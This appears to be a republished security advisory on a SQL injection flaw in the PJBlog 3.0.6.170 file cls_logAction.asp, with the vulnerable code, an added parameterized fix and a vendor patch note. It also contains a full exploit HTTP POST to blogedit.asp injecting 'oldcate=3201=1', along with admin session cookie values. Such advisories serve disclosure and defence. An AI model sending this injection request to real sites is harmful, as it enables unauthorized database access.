PJBlog personal blog system: injection vulnerability in the cls_logAction.asp file
程序员文章站
2022-03-12 17:34:20
Affected version: PJBlog 3.0.6.170
Program description:
PJBlog is a free, open-source Chinese personal blog system built on ASP + Access. It offers high performance and a frequent update cadence, and it supports the newer techniques used by current blog software.
Vulnerability... 09-05-24...
Vulnerability analysis:
In the file class/cls_logAction.asp:
    oldCate = Request.Form("oldcate")    ' line 429
    oldCtype = Request.Form("oldtype")
    d = Conn.Execute("SELECT cate_part FROM blog_Category WHERE cate_ID=" & oldCate)(0)
The program places the variable oldcate into the SQL query without any filtering, which produces the injection vulnerability.
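As an added example (not the advisory's text and not PJBlog's own code), the same lookup rewritten so that the category id is validated as a plain integer and bound as a query parameter through ADODB.Command instead of being concatenated into the SQL string. It assumes an open ADODB.Connection named Conn; the table and column names are those from the snippet above, and IsPlainInteger and GetCatePart are names introduced here.

```asp
<%
' Added example, not PJBlog's code: hardened replacement for the
' vulnerable lookup. Assumes an open ADODB.Connection named Conn.

' Accept only a plain decimal integer, so a value such as "3201=1"
' or anything carrying SQL syntax is rejected before any query runs.
Function IsPlainInteger(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    IsPlainInteger = re.Test(s)
End Function

' Look up cate_part for a category id using a bound parameter.
' Returns Empty when the id is invalid or no row matches.
Function GetCatePart(rawId)
    Dim cmd, rs
    GetCatePart = Empty
    If Not IsPlainInteger(rawId) Then Exit Function

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = 1    ' adCmdText
    cmd.CommandText = "SELECT cate_part FROM blog_Category WHERE cate_ID = ?"
    ' adInteger = 3, adParamInput = 1; the value is typed as a Long,
    ' so the provider never interprets it as SQL text.
    cmd.Parameters.Append cmd.CreateParameter("cate_ID", 3, 1, , CLng(rawId))

    Set rs = cmd.Execute
    If Not rs.EOF Then GetCatePart = rs(0)
    rs.Close
End Function

Dim oldCate, d
oldCate = Request.Form("oldcate")
d = GetCatePart(oldCate)
If IsEmpty(d) Then
    Response.Write "Invalid category"
    Response.End
End If
%>
```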
Vulnerability exploitation:
POST /blogedit.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer:
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host: 127.0.0.1
Content-Length: 513
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pjblog3setting=viewtype=normal; pjblog3=memright=111111111111&memhashkey=c80f369e20b317566f736dbc70839834745d9c20&memname=admin&exp=2010%2d4%2d21; ASPSESSIONIDCCDSDABA=oebbhcodjfkijegkgcphgmcp

id=1&log_edittype=1&action=post&log_isdraft=false&title=xxx&log_cateid=3&cname=xxx&ctype=0&oldcname=xxx&oldtype=0&oldcate=3201=1&log_weather=sunny&log_level=level3&log_comorder=1&blog_pws=0&log_readpw=&log_pwtips=&c_pws=0&blog_meta=0&evio_keywords=xxx&evio_description=web+safe&log_from=%e6%9c%ac%e7%ab%99%e5%8e%9f%e5%88%9b&log_fromurl=http%3a%2f%2flocalhost%2fbackci%2f&pubtimetype=com&pubtime=2009-4-21+15%3a54%3a46&tags=&ubbfonts=&ubbfonts=&ubbfonts=&ubbmethod=on&message=web+safe&log_intro=web+safe&log_quote=

Solution:
Vendor patch:
PJBlog
-------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage: